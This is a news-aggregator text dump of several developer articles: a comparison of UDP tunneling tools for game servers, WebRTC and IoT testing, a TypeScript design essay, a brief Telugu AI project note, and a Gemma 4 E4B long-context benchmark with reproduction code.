# wpnews.pro — Full Content Corpus (en)

> 100 most-recent articles in markdown. Updated every 30 min.
> Source: https://wpnews.pro/llms-full.txt

---
## Beyond HTTP: Exposing WebRTC and Local Game Servers via UDP Tunnels

> Published: 2026-05-24 06:53:44+00:00
> Source: https://dev.to/instatunnel/beyond-http-exposing-webrtc-and-local-game-servers-via-udp-tunnels-5ak5
> wpnews: https://wpnews.pro/news/beyond-http-exposing-webrtc-and-local-game-servers-via-udp-tunnels

InstaTunnel Team
Published by our engineering team
For the better part of the last decade, developers have relied on localhost tunneling services to expose local applications to the wider internet. Tools that generate a quick, temporary URL pointing straight to your machine’s port 3000 became indispensable for web developers building webhooks, OAuth flows, and REST APIs.
But the development ecosystem of 2026 has outgrown that model. We are no longer just building stateless HTTP web applications. We are building real-time multiplayer game netcode, low-latency video streaming applications using WebRTC, and specialized IoT networks running protocols like CoAP and DTLS. The problem is that most legacy tunneling tools are strictly hardcoded for HTTP and TCP. When you try to route a connectionless protocol like UDP through a TCP-centric tunnel, you encounter massive overhead, latency spikes, and fundamentally broken application behaviour.
This article explains why, walks through the tools that actually solve it, and covers what you need to know to do it safely.
The UDP Problem: Why Traditional Tunnels Fail
To understand why tunneling UDP is difficult, you have to look at the architectural difference between TCP and UDP.
TCP (Transmission Control Protocol) is connection-oriented. It guarantees delivery, manages packet ordering, and handles error checking. It is perfect for web traffic, where receiving every byte of an HTML document in the correct order is non-negotiable. Traditional tunneling tools thrive on TCP because they act as reverse proxies, managing the state of the connection between the public endpoint and your local machine.
UDP (User Datagram Protocol) is connectionless — a fire-and-forget protocol. It does not care if a packet arrives out of order, or at all. This absence of overhead is what makes UDP the backbone of real-time applications where low latency beats perfect reliability.
When you push a game server’s UDP traffic through a TCP tunnel, the tunneling software encapsulates lightweight, stateless UDP packets inside a heavy, stateful TCP connection. This produces head-of-line blocking: if a single packet is lost on the public network, TCP stalls the entire stream while waiting for retransmission. For a web page, that is a minor delay. For a fast-paced multiplayer game or a live WebRTC video call, it means rubber-banding, latency spikes, and dropped clients.
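A toy model makes the stall visible. The sketch below is not a network simulator: the send interval, one-way delay, and retransmission delay are assumed values chosen for illustration, and the function names are hypothetical. It compares when each packet reaches the application under in-order (TCP-like) delivery and per-datagram (UDP-like) delivery when exactly one packet is lost.

```python
SEND_INTERVAL_MS = 16   # assumed: one state update per ~60 Hz tick
ONE_WAY_DELAY_MS = 30   # assumed network delay
RETRANSMIT_MS = 200     # assumed time for TCP to detect and resend a lost segment


def udp_like(n, lost):
    """Each datagram reaches the app on arrival; the lost one never arrives (None)."""
    return [None if seq == lost else seq * SEND_INTERVAL_MS + ONE_WAY_DELAY_MS
            for seq in range(n)]


def tcp_like(n, lost):
    """Data is delivered in order, so everything behind the lost segment waits."""
    delivered, ready_at = [], 0
    for seq in range(n):
        arrival = seq * SEND_INTERVAL_MS + ONE_WAY_DELAY_MS
        if seq == lost:
            arrival += RETRANSMIT_MS  # arrives only after retransmission
        ready_at = max(ready_at, arrival)
        delivered.append(ready_at)
    return delivered


def added_delay(n, lost):
    """Extra wait per packet (ms) caused by in-order delivery; None for the lost one."""
    return [None if u is None else t - u
            for u, t in zip(udp_like(n, lost), tcp_like(n, lost))]


if __name__ == "__main__":
    for seq, extra in enumerate(added_delay(8, lost=2)):
        print(seq, extra)
```

Under these assumptions every packet sent after the lost one is held back until the retransmission lands, even though it already arrived. A game client would rather drop the stale update and use the newer ones.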
This architectural mismatch is exactly why ngrok — arguably the most widely installed tunneling tool in the world — still does not support UDP in 2026. Its free tier also carries a hard 1 GB/month bandwidth cap, and its recent pivot toward enterprise “Universal Gateway” features has made the free experience noticeably more restrictive.
The Bigger Picture: UDP Is Winning at the Protocol Level
This is not just a developer-tooling story. The broader internet is moving toward UDP at a fundamental level.
HTTP/3, the latest version of HTTP, runs over QUIC (RFC 9000) — a transport protocol built on UDP, not TCP. QUIC solves TCP’s head-of-line blocking problem at the transport layer: each stream handles packet loss independently, so a lost packet for one resource does not freeze the others. As of October 2025, HTTP/3 adoption had reached 35% of global traffic according to Cloudflare data, and over 95% of major web browsers support it. Real-world benchmarks show HTTP/3 response times roughly 47% faster than HTTP/1.1 on high-latency or lossy connections.
For streaming media, Media over QUIC (MOQ) is emerging as an alternative to WebRTC for broadcast-grade use cases, with sub-second latency over QUIC-based WebTransport. The first production MOQ deployment launched in 2025.
The takeaway for developers: UDP is no longer a niche concern for game programmers. It is the foundation of the modern, real-time web. Your tooling needs to reflect that.
The Modern UDP Tunneling Landscape (2026)
The tunneling market has bifurcated. A handful of tools handle HTTP well and UDP not at all (ngrok, Localtunnel). A newer generation treats UDP as a first-class citizen. Here is where things stand.
LocalXpose
LocalXpose has become the go-to recommendation in communities like r/selfhosted and gaming forums for raw protocol support. It treats HTTP, HTTPS, TCP, TLS, and UDP as equally valid tunnel types. Its dedicated UDP tunnels map a public port directly to your local instance without encapsulation overhead, and it provides both a CLI and a GUI — making it accessible to non-developers who want to run a game server for friends without learning terminal flags. Pricing is approximately $6/month for 10 concurrent tunnels with unlimited bandwidth, along with a built-in file server for sharing game mods or server logs.
Pinggy
Pinggy has gained traction in the terminal-first crowd with one compelling trick: it requires nothing to install. You run a standard SSH command and get a live tunnel — no npm package, no binary. It supports HTTP, HTTPS, TCP, UDP, and TLS tunnels, and adds a terminal UI with QR codes and a built-in request inspector. The Pro plan is $3/month, less than half the cost of ngrok’s Personal plan ($8/month), and unlike ngrok, UDP is fully supported. For quick “let me show you this” moments, it is hard to beat.
Localtonet
Localtonet has become a strong all-rounder, described as offering features that would otherwise require three separate tools: a webhook inspector, a file server, and a mobile proxy — all in one. It supports HTTP, TCP, and UDP with end-to-end encryption across 16+ global server locations. At approximately $2/tunnel/month with unlimited bandwidth and no session timeouts, it significantly undercuts ngrok on price.
Playit.gg
Playit.gg is purpose-built for gamers. It provides both TCP and UDP tunnels for hosting Minecraft, Terraria, and other multiplayer game servers, is open source, and offers a generous free tier with up to 4 TCP and 4 UDP tunnels. The paid plan (Playit Plus) costs $3/month or $30/year and adds custom domains, dedicated IPs, and additional tunnels. If your only use case is hosting a game server, this is the most frictionless starting point.
Self-Hosted: FRP and WireGuard
For teams with data sovereignty requirements, self-hosted options like FRP (Fast Reverse Proxy) give you full control over your infrastructure, no vendor lock-in, and support for complex protocol configurations. WireGuard, often paired with Tailscale for zero-configuration NAT traversal, provides proven speed advantages with minimal latency — particularly well-suited for streaming, video, and high-frequency update workloads. Wrapping WireGuard in QUIC (as Mullvad and others now support) makes the traffic indistinguishable from ordinary HTTP/3 web traffic, which is rarely filtered even on restrictive networks.
Use Case 1: Local Game Servers
Game servers rely heavily on UDP for player position updates, fast-sync actions, and state replication. If your ISP uses Carrier-Grade NAT (CGNAT) — meaning you do not actually have a public IP address to port forward from your router — you traditionally had to rent a cloud VPS just to test your netcode.
With LocalXpose, exposing a local game server is a single command. If your server is listening on port 19132:
loclx tunnel udp --to 127.0.0.1:19132 --region us
The CLI outputs a public endpoint such as us-1.loclx.io:4506. Your friends or playtesters enter that address into their game client. Traffic flows cleanly through the public UDP endpoint to your machine, preserving the low latency required for real-time play. With Pinggy, the equivalent command using SSH is:
ssh -p 443 -R0:localhost:19132 udp@a.pinggy.io
No binary to install, no account required to try it.
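Before handing an endpoint to playtesters, it can help to confirm that datagrams make the round trip at all. The following is a minimal sketch using only the Python standard library: a throwaway echo server to run in place of the game server, and a probe that measures round-trip time. The names `run_echo_server` and `udp_probe` are hypothetical, and a real game server will not echo arbitrary payloads, so this only tests the tunnel path.

```python
import socket
import threading
import time


def run_echo_server(sock):
    """Echo every datagram back to its sender until the socket is closed."""
    while True:
        try:
            data, addr = sock.recvfrom(2048)
        except OSError:
            return  # socket was closed
        sock.sendto(data, addr)


def udp_probe(host, port, payload=b"ping", timeout=2.0):
    """Send one datagram; return the round-trip time in seconds, or None on timeout."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        start = time.perf_counter()
        s.sendto(payload, (host, port))
        try:
            data, _ = s.recvfrom(2048)
        except socket.timeout:
            return None
        return time.perf_counter() - start if data == payload else None


if __name__ == "__main__":
    # Local demonstration on the loopback interface, using an OS-assigned port.
    server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    server.bind(("127.0.0.1", 0))
    port = server.getsockname()[1]
    threading.Thread(target=run_echo_server, args=(server,), daemon=True).start()
    print(udp_probe("127.0.0.1", port))
```

To test a tunnel, bind the echo server to the local port the tunnel forwards to, then call `udp_probe` from another network with the public host and port the tunnel client printed.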
Use Case 2: WebRTC Testing and Video Apps
WebRTC is the standard for browser-based, peer-to-peer real-time communication. While its initial signalling phase (exchanging connection details via SDP) happens over HTTP or WebSockets, the actual media streams are transmitted over UDP using SRTP (Secure Real-time Transport Protocol).
Testing WebRTC locally is notoriously frustrating. WebRTC uses the ICE (Interactive Connectivity Establishment) framework to gather candidate addresses and select a working path between peers, preferring direct routes over relayed ones. Corporate firewalls and NAT regularly block the incoming UDP media streams, so the signalling handshake succeeds but neither side can hear or see the other. STUN and TURN servers help with NAT traversal, but they do not solve the problem of your local SFU or media server not being reachable at all.
The practical fix is to tunnel both layers simultaneously. Using a service like Localtonet, which supports mixed TCP/UDP workloads, you can expose your signalling server (TCP/HTTP) and your media ports (UDP) at the same time. This allows external peers or mobile devices to connect to your local WebRTC instance and stream video directly through the firewall, mimicking a production environment without deploying to a staging server.
For teams using mediasoup, Janus, or a custom SFU locally, this removes a significant CI friction point.
Use Case 3: IoT and Embedded Systems
The IoT ecosystem favours lightweight protocols to conserve battery life and bandwidth on constrained devices. CoAP (Constrained Application Protocol) and MQTT-SN run over UDP and can be secured with DTLS (Datagram TLS); standard MQTT, by contrast, requires TCP.
If you are developing firmware for a custom sensor board and need to test its telemetry reporting to an external cloud ingestion service, you need a public UDP endpoint that you can hand off to a remote team or a CI pipeline. Tunnels like LocalXpose or Pinggy let you expose your local IoT rig to the internet, allowing cloud-based services to push commands directly to a device on your desk — no staging environment required.
Security: What You Are Actually Exposing
UDP tunnels are powerful, but they fundamentally extend your localhost’s trust boundary to the open internet. Do not treat them as casually as an HTTP tunnel.
DDoS vulnerability. Unlike HTTP tunnels that can rate-limit requests based on headers and session state, raw UDP tunnels forward datagrams indiscriminately. An attacker who discovers your public UDP endpoint can flood it with garbage packets, easily saturating your local connection. Always close UDP tunnels the moment your testing session ends — ephemeral is not just convenient, it is a security property.
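Since the tunnel will not rate-limit for you, the listening application can at least refuse to do work for noisy senders. Here is a minimal sketch of a per-source token bucket; the class name and parameters are hypothetical, and the injectable clock exists only to make the behaviour testable.

```python
import time


class PerSourceRateLimiter:
    """Token bucket per source address; callers drop datagrams when allow() is False."""

    def __init__(self, rate_per_sec, burst, clock=time.monotonic):
        self.rate = rate_per_sec      # tokens refilled per second
        self.burst = burst            # maximum tokens a sender can accumulate
        self.clock = clock
        self.buckets = {}             # addr -> (tokens, time of last update)

    def allow(self, addr):
        now = self.clock()
        tokens, last = self.buckets.get(addr, (self.burst, now))
        # Refill according to elapsed time, capped at the burst size.
        tokens = min(self.burst, tokens + (now - last) * self.rate)
        if tokens < 1:
            self.buckets[addr] = (tokens, now)
            return False
        self.buckets[addr] = (tokens - 1, now)
        return True
```

In a receive loop this would sit directly after `recvfrom`, before any parsing. It protects the application's CPU, not the link: a flood still consumes bandwidth before the datagrams reach this check, UDP source addresses can be spoofed, and the bucket table needs eviction in anything long-running.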
No inherent authentication layer. HTTP tunnels can overlay Basic Auth or OAuth. Raw UDP does not have that concept. The application listening on the exposed port must handle its own authentication. If you are exposing a game server or local database, ensure it requires strong credentials independently of the tunnel.
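One way an application can authenticate datagrams itself is a keyed MAC over each payload. The sketch below assumes a pre-shared key and a made-up wire layout (8-byte timestamp, payload, 32-byte HMAC-SHA256 tag); it is an illustration of the idea, not a protocol any of the tools above implement.

```python
import hashlib
import hmac
import struct
import time

TAG_LEN = 32  # size of an HMAC-SHA256 tag in bytes


def seal(key, payload, now=None):
    """Prefix the payload with a timestamp and append an HMAC-SHA256 tag."""
    ts = struct.pack("!Q", int(time.time() if now is None else now))
    body = ts + payload
    return body + hmac.new(key, body, hashlib.sha256).digest()


def open_sealed(key, datagram, max_age_s=30, now=None):
    """Return the payload if the tag verifies and the timestamp is fresh, else None."""
    if len(datagram) < 8 + TAG_LEN:
        return None
    body, tag = datagram[:-TAG_LEN], datagram[-TAG_LEN:]
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):  # constant-time comparison
        return None
    (ts,) = struct.unpack("!Q", body[:8])
    current = time.time() if now is None else now
    if abs(current - ts) > max_age_s:
        return None
    return body[8:]
```

This authenticates but does not encrypt, and a captured datagram can be replayed within the freshness window. Where the protocol allows it, DTLS or the server's own login mechanism is the sturdier choice.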
The OAuth redirect URI trap. A real risk that has become more visible in 2026: developers who register an ephemeral tunnel URL as an authorised redirect URI in a Google or GitHub OAuth app and forget to remove it after the PR merges. If that subdomain pattern is later issued to another user on the same tunneling service, they can potentially intercept OAuth callbacks. Mitigate this by implementing automated cleanup of OAuth redirect URIs as part of your PR merge workflow, and enforce OIDC authentication at the tunnel edge for any OAuth-adjacent testing.
Identity-aware access for sensitive workloads. For anything beyond throwaway local testing, tools like Cloudflare Tunnel or Tailscale enforce authentication before traffic can reach your tunnel endpoint. This should be the baseline for any tunnel that stays up longer than a single session.
Tool Comparison at a Glance

| Feature | ngrok | Pinggy | LocalXpose | Localtonet | Playit.gg |
|---|---|---|---|---|---|
| UDP Support | ✗ | ✓ | ✓ | ✓ | ✓ |
| Free Tier | 1 GB/mo | Yes | Yes | 1 tunnel, 1 GB | 4 UDP + 4 TCP |
| Paid Plan | $8/mo | $3/mo | ~$6/mo | ~$2/tunnel/mo | $3/mo |
| Install Required | Yes | No (SSH) | CLI/GUI | CLI/GUI/SSH | Yes |
| Best For | HTTP/Webhooks | Quick sharing | Gaming, IoT | All-round workloads | Game servers |

What Is Next: WebTransport and the Blurring Line
The line between “UDP tunneling” and “HTTP” is going to

---
## Stop Using TypeScript as a Type Checker — Start Using It as a Design System

> Published: 2026-05-24 06:52:16+00:00
> Source: https://dev.to/dev_ahmed1/stop-using-typescript-as-a-type-checker-start-using-it-as-a-design-system-8o0
> wpnews: https://wpnews.pro/news/stop-using-typescript-as-a-type-checker-start-using-it-as-a-design-system

TypeScript is often misunderstood as merely "JavaScript with types," but this definition captures only about 30% of its value. Its true power lies not in preventing runtime errors, but in enforcing system design discipline at compile time by making invalid states unrepresentable through constructs like discriminated unions and strict type contracts. When used as a design system rather than just a type checker, TypeScript transforms code evolution from guesswork to verified, mechanical change, eliminating entire categories of bugs caused by unclear data shapes, implicit assumptions, and inconsistent API responses.

TypeScript is often introduced as:

“JavaScript with types”

That definition is technically correct — and practically misleading.

Because if this is how you use TypeScript, you are only using ~30% of its value.

The real power of TypeScript is not in preventing runtime errors.

It is in forcing system design discipline at compile time.

This article focuses on how TypeScript changes architecture decisions, not syntax.

- The Hidden Problem in JavaScript: Undefined Contracts

In JavaScript systems, most bugs don’t come from syntax mistakes.

They come from:

unclear data shapes

implicit assumptions between modules

silent undefined values

inconsistent API responses

Example:

```
getUser().name.toUpperCase()
```

This assumes:

user exists

name exists

name is a string

Nothing enforces this.

- TypeScript’s Real Job: Making Assumptions Explicit

Now rewrite the same idea:

```
type User = {
  name: string;
};

declare function getUser(): User | null;
```

Now the system forces you to handle reality:

``` js
function printUserName() {
  const user = getUser();

  // getUser() may return null, so that case has to be handled first.
  if (!user) return;

  console.log(user.name.toUpperCase());
}
```

The key difference is not safety.

The key difference is:

you are no longer allowed to ignore system uncertainty.

- Union Types Are a State Machine in Disguise

Most developers treat union types as a convenience:

```
type Status = "idle" | "loading" | "success" | "error";
```

But this is actually a state machine definition.

Now your UI logic becomes constrained:

```
if (status === "loading") {}
if (status === "error") {}
```

You are no longer writing “if checks”.

You are modeling system behavior.

- The “Impossible State” Problem and Why TypeScript Solves It

In JavaScript, you can easily reach invalid states:

loading = true + error exists

user = null + role = "admin"

data = undefined but UI rendered

TypeScript eliminates this class of bugs using discriminated unions:

```
type State =
  | { status: "loading" }
  | { status: "success"; data: string }
  | { status: "error"; message: string };
```

Now invalid states are unrepresentable.

This is not a feature.

This is architecture enforcement.

- Type Inference Is a Compiler-Driven Design Assistant

A common misconception:

“TypeScript slows development down”

In reality, inference reduces mental overhead.

Example:

``` js
const users = [
  { id: 1, role: "admin" },
  { id: 2, role: "user" }
];
```

TypeScript automatically derives:

```
{
  id: number;
  role: string;
}[]
```

Now you get:

autocomplete

refactoring safety

consistency across the codebase

Without manually maintaining types everywhere.

- Type Narrowing = Controlled Execution Flow

Instead of runtime guessing:

```
if (typeof value === "string") {
  value.toUpperCase();
}
```

TypeScript makes execution flow explicit.

But the deeper idea is:

Type narrowing is not about types — it is about controlling program paths.

Every if becomes a validated transition of state.

- API Design Becomes a Compile-Time Contract

Compare:

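JavaScript API versus TypeScript API:

```
// JavaScript: nothing documents or checks the shape of `data`.
createUser(data)

// TypeScript: the signature states the payload and the result.
declare function createUser(data: {
  email: string;
  password: string;
}): Promise<{ id: string }>;
```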

Now the function is not just implementation.

It is a public contract enforced by the compiler.

For callers checked by the compiler, this eliminates:

invalid payloads

undocumented requirements

runtime validation leaks

- Why Large Systems Break Without Type Systems

In large codebases, JavaScript fails in one core way:

Change becomes dangerous.

Because nothing tells you what breaks.

TypeScript flips this:

Change becomes mechanical.

You modify a type → compiler shows impact instantly.

This changes system evolution from:

guessing → verification

runtime debugging → compile-time correction

Conclusion

TypeScript is not a productivity tool.

It is a system constraint engine.

If you use it only for:

avoiding any

adding types to functions

basic autocomplete

You are underusing it.

The real value is this:

TypeScript lets you design systems where invalid states cannot compile.

That is the real upgrade from JavaScript — not syntax, but discipline.

---
## How Google I/O 2026 Inspired Me to Start Building a Telugu Jarvis AI

> Published: 2026-05-24 06:49:33+00:00
> Source: https://dev.to/bajiniteenoj/how-google-io-2026-inspired-me-to-start-building-a-telugu-jarvis-ai-249f
> wpnews: https://wpnews.pro/news/how-google-i-o-2026-inspired-me-to-start-building-a-telugu-jarvis-ai

The author describes being inspired by Google I/O 2026 to create a Telugu-language AI assistant, similar to "Jarvis." They argue that AI should be accessible in regional languages like Telugu to help millions of Indian students learn and communicate more effectively. The project aims to build Telugu-first AI experiences to make technology more inclusive and confidence-building for non-English speakers.

Note: I used AI tools to help improve writing structure and organize my ideas, while the project concept, opinions, and personal perspective are my own.
Why Regional Language AI Matters
One thing I strongly believe is that AI should not only work well for English speakers.
In countries like India, millions of students are more comfortable learning and communicating in regional languages like Telugu. If AI tools become more multilingual and accessible, they can help students learn faster and feel more confident using technology.
That is one of the main reasons I want to continue building Telugu-first AI experiences.

---
## I stress-tested Gemma 4 E4B's 128K context on a laptop GPU — recall is great, prefill is not

> Published: 2026-05-24 06:44:15+00:00
> Source: https://dev.to/yashksaini/i-stress-tested-gemma-4-e4bs-128k-context-on-a-laptop-gpu-recall-is-great-prefill-is-not-244i
> wpnews: https://wpnews.pro/news/i-stress-tested-gemma-4-e4b-s-128k-context-on-a-laptop-gpu-recall-is-great-is


The article details a stress test of the Gemma 4 E4B model's 128K context window on a laptop GPU (RTX 5050). The test found that while the model's recall of information within the context remained perfect across all tested sizes, the "time to first token" (prefill latency) increased dramatically and almost linearly with context length, rising from 4 seconds at 5K tokens to 72 seconds at 100K tokens. The author concludes that the 128K specification is accurate but misleading, as it does not account for the significant prefill latency that makes the model impractical for interactive use on consumer hardware.

Thursday night I let a benchmark run while I slept. By Friday morning Gemma 4 E4B had answered fifteen needle-in-a-haystack questions across four context sizes on my RTX 5050 laptop. The recall numbers were better than I expected. The latency numbers were worse. Here's both, with the ~30 lines of Python to reproduce it on your own hardware.

I keep seeing "Gemma 4 E4B has a 128K context window" repeated as if it were a single property, like *"the engine is 3.5 litres"*. It is not a single property. A context-window number means at least three different things — *will the model accept this many tokens?*, *will it remember what's in the middle of them?*, and *how fast does the first answer token arrive?* — and the answers diverge sharply once you leave the laptop-GPU regime that most spec sheets assume.

This is the post I wish I'd had when I started building on E4B. The TL;DR is in the table further down. The reproducible test rig is at the bottom.

## The setup

- **Hardware:** RTX 5050 Laptop, 8 GB VRAM, 24 GB system RAM, Intel i7-13620H
- **Software:** Ollama 0.24.0, `gemma4:e4b` (Q4_K_M, ~9.6 GB on disk), Linux 7.x
- **Test:** needle-in-a-haystack: five unique 4-character codes embedded at fixed positions inside a long synthetic English document; the model has to recover each one in isolation by exact match.

The test is deliberately simple. I want to know whether the model can *find* a fact at a known position, not whether it can paraphrase it. Reasoning quality is a different benchmark and needs human evaluation, which I didn't have budget for.

I ran the sweep at 5K, 20K, 60K, and 100K target context sizes. I didn't push to the 128K spec because Ollama's `num_ctx` setting interacts with the K/V cache headroom in ways I didn't have time to characterize cleanly, and 100K is already 80% of the spec.

## The numbers

| Context | Pass rate (5/5) | Tokens/sec | Time to first token |
|---|---|---|---|
| 5K | 5/5 ✓ | 9.2 | 4 s |
| 20K | 5/5 ✓ | 8.6 | 15 s |
| 60K | 5/5 ✓ | 7.6 | 38 s |
| 100K | 5/5 ✓ | 6.8 | 72 s |

Three things stand out.

**Recall stayed perfect.** I expected E4B to wobble somewhere past 60K — that's the failure mode I see most reported for 4B-class models, the "middle of the context is fuzzy" problem. The needles at 25% and 75% are exactly where I'd expect drop-off. They held. I re-ran the sweep twice to be sure.

**Generation throughput barely moved.** 9.2 tok/s at 5K vs. 6.8 tok/s at 100K. That's a 26% drop across a 20x context increase. The K/V cache is the obvious culprit, but in practical terms: once the answer starts streaming, it streams at roughly the same speed.

**Time to first token blew up.** 4s at 5K, 72s at 100K. Almost linear in context size. This is the prefill phase — the model encoding everything you sent it before producing the first output token. On a laptop GPU, prefill is where the consumer-hardware tax lives.
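The arithmetic behind those two observations can be checked directly from the table. This is a small sketch, not part of the benchmark rig: it treats the whole time to first token as prompt processing and uses the nominal target sizes rather than exact token counts, both of which are simplifying assumptions. The helper names are hypothetical.

```python
# (context tokens, time to first token in seconds, generation tokens/sec), from the table
MEASURED = [
    (5_000, 4, 9.2),
    (20_000, 15, 8.6),
    (60_000, 38, 7.6),
    (100_000, 72, 6.8),
]


def prefill_rate(tokens, ttft_s):
    """Approximate prompt-processing throughput in tokens per second."""
    return tokens / ttft_s


def relative_drop(first, last):
    """Fractional decrease from first to last."""
    return (first - last) / first


if __name__ == "__main__":
    for tokens, ttft, _ in MEASURED:
        print(f"{tokens:>7,} tokens: ~{prefill_rate(tokens, ttft):,.0f} prompt tok/s")
    drop = relative_drop(MEASURED[0][2], MEASURED[-1][2])
    print(f"generation throughput drop: {drop:.0%}")
    print(f"TTFT grew {MEASURED[-1][1] / MEASURED[0][1]:.0f}x "
          f"for {MEASURED[-1][0] / MEASURED[0][0]:.0f}x the context")
```

The implied prefill rate stays between roughly 1,250 and 1,580 tokens per second across the sweep, which is what "almost linear" looks like: the cost per prompt token is roughly constant, so the wait scales with the prompt.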

## What this means if you're building on E4B

Let me write the practical zones the way I actually think about them, not the marketing version:

- **Under 20K tokens:** *interactive.* First token in ~15 seconds, full answer in ~25-30s. This feels like a real conversation. Most single-paper Q&A lives here.
- **20K to 60K tokens:** *research-assistant.* 30-40 second TTFT. You're going to glance away from the screen. That's fine, the answer will be there when you look back. Multi-paper comparisons, longer contexts.
- **60K to 100K tokens:** *batch.* You're queuing a job. 60-80 second TTFT means you might as well make coffee. Loading a whole codebase, a textbook chapter, a quarter's worth of meeting notes.
- **Above 100K:** I didn't measure. The prefill cost was already breaching my "is this still interactive?" threshold and the use case I was solving for didn't need it.

If you're designing a UI on top of this model, *surface these zones to the user*. A progress bar or a tier label ("interactive / research / batch") tells someone what their next click will *feel* like before they ask. The 128K spec is honest; it just doesn't tell you when it'll start.
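A tier label like that can be computed before the request is sent. The sketch below is one possible mapping, assuming the zone boundaries listed above and a rough 4-characters-per-token estimate; the function names and the exact handling of the boundary values are my own choices, not something the benchmark prescribes.

```python
def estimate_tokens(text, chars_per_token=4):
    """Rough token estimate; the real count depends on the model's tokenizer."""
    return len(text) // chars_per_token


def latency_tier(prompt_tokens):
    """Map an estimated prompt size to a label describing how the wait will feel."""
    if prompt_tokens < 20_000:
        return "interactive"
    if prompt_tokens < 60_000:
        return "research"
    if prompt_tokens <= 100_000:
        return "batch"
    return "unmeasured"  # beyond the sizes covered by the sweep


if __name__ == "__main__":
    document = "word " * 50_000  # 250,000 characters
    tokens = estimate_tokens(document)
    print(tokens, latency_tier(tokens))
```

The thresholds are specific to this model and GPU; on other hardware the same idea applies, but the cut-offs would need to come from a fresh sweep.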

## Reproduce it yourself

The whole rig is about 30 lines once you strip the CLI scaffolding. Save this as `bench.py`, install `ollama` (`pip install ollama`), then run it:

``` python
import random, time
import ollama

MODEL = "gemma4:e4b"
NEEDLE_POSITIONS = [0.05, 0.25, 0.50, 0.75, 0.95]

def make_needles(k=5, seed=20260521):
    rng = random.Random(seed)
    chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    return [(f"box-{i+1}", "".join(rng.choices(chars, k=4))) for i in range(k)]

def build_haystack(target_tokens: int, needles):
    # Filler: one ~160-character English-ish sentence, repeated.
    filler = (
        "The committee continued its review of the operational notes "
        "submitted during the prior fiscal quarter, with particular "
        "attention paid to procedural anomalies. "
    )
    # Repeat generously, then truncate to ~4 characters per target token
    # (a rough heuristic; the real token count depends on the tokenizer).
    sentences_needed = target_tokens // 20
    body = (filler * sentences_needed)[: target_tokens * 4]
    # Splice needles in at fixed positions
    out = body
    for pos, (label, code) in zip(NEEDLE_POSITIONS, needles):
        i = int(pos * len(out))
        out = out[:i] + f"\n\nNote: {label} contains the code {code}.\n\n" + out[i:]
    return out

def ask(haystack: str, label: str, num_ctx: int) -> tuple[str, float, float]:
    t0 = time.time()
    first_t = None
    chunks = []
    for r in ollama.chat(
        model=MODEL,
        messages=[
            {"role": "system", "content": "Answer with only the 4-character code, nothing else."},
            {"role": "user", "content": haystack + f"\n\nWhat code is in {label}?"},
        ],
        stream=True,
        options={"num_ctx": num_ctx},
    ):
        delta = r.get("message", {}).get("content", "")
        if delta:
            first_t = first_t or time.time()
            chunks.append(delta)
    answer = "".join(chunks).strip()
    return answer, (first_t - t0) if first_t else 0, time.time() - t0

if __name__ == "__main__":
    needles = make_needles()
    for ctx in (5_000, 20_000, 60_000, 100_000):
        hay = build_haystack(ctx, needles)
        passed = 0
        for label, code in needles:
            ans, ttft, total = ask(hay, label, num_ctx=ctx + 4_000)
            passed += code in ans
            print(f"  ctx={ctx:>6,}  {label}  expected={code}  got={ans!r}  ttft={ttft:.1f}s  total={total:.1f}s")
        print(f"ctx={ctx:>6,}  pass={passed}/{len(needles)}")
```

It writes to stdout. If you want JSON-lines results to plot, redirect to a file and parse the `ctx=… pass=…` lines. The whole sweep takes ~30 minutes on an RTX 5050; longer on smaller GPUs.
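Parsing those summary lines could look like the sketch below. It assumes the output format produced by the `print` calls in `bench.py` (per-needle lines indented by two spaces, summary lines starting at column zero); the function name and the JSON field names are hypothetical.

```python
import json
import re

# Matches summary lines such as "ctx= 5,000  pass=5/5"; the indented
# per-needle lines do not start with "ctx=" and are skipped.
SUMMARY = re.compile(r"^ctx=\s*([\d,]+)\s+pass=(\d+)/(\d+)\s*$")


def summaries_to_jsonl(lines):
    """Yield one JSON string per summary line found in the benchmark output."""
    for line in lines:
        match = SUMMARY.match(line)
        if match:
            ctx, passed, total = match.groups()
            yield json.dumps({
                "ctx": int(ctx.replace(",", "")),
                "passed": int(passed),
                "total": int(total),
            })


if __name__ == "__main__":
    import sys
    for record in summaries_to_jsonl(sys.stdin):
        print(record)
```

Saved as, say, `parse_bench.py`, it would be used as `python bench.py > run.txt` followed by `python parse_bench.py < run.txt > run.jsonl`.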

The seed is fixed (`20260521`) so the needle strings are deterministic. If your pass rate doesn't match mine at the same `(model, ctx, seed)`, that's a real signal: likely Ollama version, quantization, or hardware-driver path.

## Things this rig deliberately doesn't measure

**Quality of paraphrase.** The needles are literal 4-character codes. I'm measuring *can the model find it?*, not *can the model reason about it?*. Those are different benchmarks.

**VRAM consumption.** Ollama owns the K/V cache and I'm not going to fight it for memory accounting. `nvidia-smi` says it sits around 7.4 GB at 100K context, but I haven't characterized the curve.

**Cross-document attention.** Each needle is asked in isolation. Multi-fact composition ("how does the figure on page 12 of paper A relate to section 3 of paper B?") is a different problem. I don't have a clean benchmark for it. I'm working on it.

## The honest comparison

Qwen 3.5 27B has ~190K effective context on similar hardware. Llama 3.1 70B (if you can fit it) goes further. On *raw context size alone*, Gemma 4 E4B isn't the winner.

What E4B *is* the winner at is the **combination**: 128K context + native vision + native audio + ~9.6 GB on disk, all in one model. That combination is what makes whole-document workloads tractable on a laptop. Qwen 27B doesn't fit in 8 GB of VRAM. Llama 3.1 70B doesn't either. If your hardware constraint is "consumer GPU", E4B is the only model in this class with 128K context *and* multimodality.

That's the framing I'd give someone choosing an open-weights model for a single-machine deployment in 2026.

## Three places I'd take this benchmark next

- **Mixed-modality recall.** Embed half the needles in text, half in rendered images. See if vision-encoded needles degrade differently from text-encoded ones. (This is the part most relevant to anyone building doc-Q&A.)
- **Cross-document needles.** Two documents in context, the needle in paper A, the question phrased to require paper B's vocabulary. The actual "I have a library, I want to ask questions" workload.
- **Long-document Q&A with human evaluation.** Pay five grad students to grade 100 questions about a single 25-page research paper. Real quality numbers, not synthetic ones.

If you run any of these, I'd genuinely like to read the results.

**Connect with me:**

• [Website](https://yashksaini.vercel.app/)

• [GitHub](https://github.com/yashksaini-coder)

• [LinkedIn](https://www.linkedin.com/in/yashksaini/)

• [X (Twitter)](https://x.com/0xcrackedDev)

---
## Python SDK for Tell A Bot API: Automate Your SMS Verification

